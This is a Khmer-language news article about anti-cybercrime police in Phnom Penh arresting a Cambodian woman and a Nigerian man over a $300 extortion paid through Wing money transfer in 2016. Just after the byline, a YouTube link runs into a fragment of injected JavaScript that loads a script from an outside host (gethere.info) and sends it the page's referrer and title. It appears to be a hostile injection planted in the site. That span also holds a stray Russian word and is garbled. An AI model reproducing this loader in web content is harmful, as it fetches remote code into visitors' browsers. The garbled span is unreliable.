កម្លាំងនាយកដ្ឋានប្រឆាំងបទល្មើសបច្ចេកវិទ្យាក្រសួងមហារផ្ទៃ ឃាត់ខ្លួនបុរសស្បែកខ្មៅនិងស្ត្រីខ្មែរជំរិតទារប្រាក់តាមប្រពន្ធ័ផ្ទេរប្រាក់វីង

ភ្នំពេញ៖ កម្លាំងនគរបាលនាយកដ្ឋានប្រឆាំងបទល្មើសបច្ចេកវិទ្យា ក្រសួងមហារផ្ទៃធ្វើការស្រាវនិងចាប់ឃាត់ខ្លួនជនសង្សយ័ទាំងពីរនាក់ខាងលើនេះបានធ្វើឡើងកាលពីវេលាម៉ោង ២និង៣០នាទី រសៀលថ្ងៃទី៨ ខែកញ្ញា ឆ្នាំ២០១៦ និងបាននាំខ្លួនជនសង្ស័យមកធ្វើការឆែកឆេរនៅផ្ទះជួល តាមបណ្តោយផ្លូវបេតុង១០បេតេ ក្រុម៣ ភូមិសន្សំកុល៥ សង្កាត់បឹងទំពុន ខណ្ឌមានជ័យ រាជធានីភ្នំពេញ ។

យោងតាមប្រភពព័ត៌ពីសមត្ថកិច្ចនគរបាលបានឲ្យដឹងថា ក្រោយពីសមត្ថកិច្ចទទួលបានសេចក្តីរាយការណ៍ពីជនរងគ្រោះ ថាមានគេកំហែងទារប្រាក់ចំនួន៣០០ដុល្លារ រួចមក កម្លាំងសមត្ថកិច្ចបានធ្វើការស្រាវនិងបានសហការជាមួយកម្លាំងនគរបាលព្រហ្មទណ្ឌមានជ័យ និងនគរបាលប៉ុស្តិ៍បឹងទំពុន បានធ្វើការឃាត់ខ្លួនជនសង្សយ័បានចំនួន២នាក់ ក្នុងនោះមានម្នាក់ជាស្ត្រីខ្មែរឈ្មោះ សារីម គន្ធាភេទស្រី អាយុ២៧ឆ្នាំ ស្នាក់ផ្ទះលេខ៤០អា ភូមិត្រពាំងពោធិ៍ សង្កាត់ចោមចៅ ខណ្ឌពោធិសែនជ័យ និងម្នាក់ទៀតជាជនជាតិស្បែកខ្មៅមានឈ្មោះUCHECHUKWU VINCENT អាយុ៣៧ឆ្នាំ ជនជាតិនីហ្សេរីយ៉ា ទើបតែមកដល់ប្រទេសកម្ពុជាបានរយៈពេល៤ថ្ងៃ អ្នកទាំងពីរស្នាក់នៅផ្ទះជួលភូមិសន្សំកុសល៥សង្កាត់បឹងទំពុន ខណ្ឌមានជ័យជាមួយគ្នា ។

មុនពេលកើតហេតុជនសង្ស័យខាងលើបានមកដកលុយចំនួន៣០០ដុល្លារនៅក្បែរផ្ទះជួលរបស់ខ្លួន ក៍ប៉ុន្តែមិនបានសម្រេចនោះទេ ត្រូវបានសមត្ថកិច្ចធ្វើការស្ទាក់ចាប់ខ្លួនបានភ្លាមៗតែម្តង ហើយបច្ចុប្បន្នជនសង្ស័យទាំងពីរនាក់ ត្រូវបានសមត្ថកិច្ចបញ្ជូនខ្លួនទៅកាន់នាយកដ្ឋានប្រឆាំងបទល្មើសបច្ចេកវិទ្យាក្រសួងមហាផ្ទៃ ដើម្បីរង់ចាំធ្វើសាកសួរបន្ត និងកសាងសំណុំរឿងបញ្ជួនខ្លួនទៅកាន់តុលាការចាត់ការតាមនីតិវិធីច្បាប់ ៕ដោយ៖ អាត ចន្ធូ яндекс

https://youtu.be/1csobG3crUMs.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

អត្ថបទដែលជាប់ទាក់ទង

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More